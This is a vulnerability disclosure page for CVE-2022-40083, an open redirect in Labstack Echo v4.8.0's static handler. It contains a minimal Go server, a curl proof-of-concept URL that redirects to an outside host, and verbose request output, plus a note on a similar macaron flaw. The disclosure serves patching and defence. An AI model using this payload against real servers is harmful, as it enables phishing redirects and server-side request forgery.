Headline
CVE-2022-40083: vulnerability: open redirect in static handler · Issue #2259 · labstack/echo
Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
Issue Description
301 redirect and may further cause ssrf
see:
go-macaron/macaron#198
also see:
diango CVE-2018-14574
package main
import ( “github.com/labstack/echo/v4” )
func main() { e := echo.New() e.Static("/", “./”) e.Logger.Fatal(e.Start(“:1323”)) }
D:\> curl -Lv http://127.0.0.1:1323//ruokeqx.gitee.io%2f… * Trying 127.0.0.1:1323… * Connected to 127.0.0.1 (127.0.0.1) port 1323 (#0) > GET //ruokeqx.gitee.io%2f… HTTP/1.1 > Host: 127.0.0.1:1323 > User-Agent: curl/7.83.1 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 301 Moved Permanently < Location: //ruokeqx.gitee.io/…/ < Date: Sun, 04 Sep 2022 18:47:04 GMT < Content-Length: 0 < * Connection #0 to host 127.0.0.1 left intact * Clear auth, redirects to port from 1323 to 80 * Issue another request to this URL: ‘http://ruokeqx.gitee.io/’ * Trying 212.64.63.190:80… * Connected to ruokeqx.gitee.io (212.64.63.190) port 80 (#1) > GET / HTTP/1.1 > Host: ruokeqx.gitee.io > User-Agent: curl/7.83.1 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 301 Moved Permanently < Date: Sun, 04 Sep 2022 18:47:03 GMT < Content-Type: text/html < Content-Length: 182 < Connection: keep-alive < Server: openresty < Location: https://ruokeqx.gitee.io/ < Expires: Mon, 05 Sep 2022 18:47:03 GMT < Cache-Control: max-age=86400 < * Ignoring the response-body * Connection #1 to host ruokeqx.gitee.io left intact * Clear auth, redirects to port from 80 to 443 * Issue another request to this URL: ‘https://ruokeqx.gitee.io/’ * Trying 212.64.63.190:443… * Connected to ruokeqx.gitee.io (212.64.63.190) port 443 (#2) * schannel: disabled automatic use of client certificate * ALPN: offers http/1.1 * ALPN: server accepted http/1.1 > GET / HTTP/1.1 > Host: ruokeqx.gitee.io > User-Agent: curl/7.83.1 > Accept: */* > * schannel: failed to decrypt data, need more data * schannel: failed to decrypt data, need more data * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Sun, 04 Sep 2022 18:47:04 GMT < Content-Type: text/html < Content-Length: 94632 < Connection: keep-alive < Server: openresty < Last-Modified: Sun, 04 Sep 2022 17:49:25 GMT < ETag: “6314e525-171a8” < Expires: Mon, 05 Sep 2022 18:47:04 GMT < Cache-Control: max-age=86400 < Accept-Ranges: bytes < <!DOCTYPE html> …
Related news
Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF). Version 4.9.0 contains a patch for the issue.
macaron before 1.3.7 has an open redirect in the static handler, as demonstrated by the http://127.0.0.1:4000//example.com/ URL.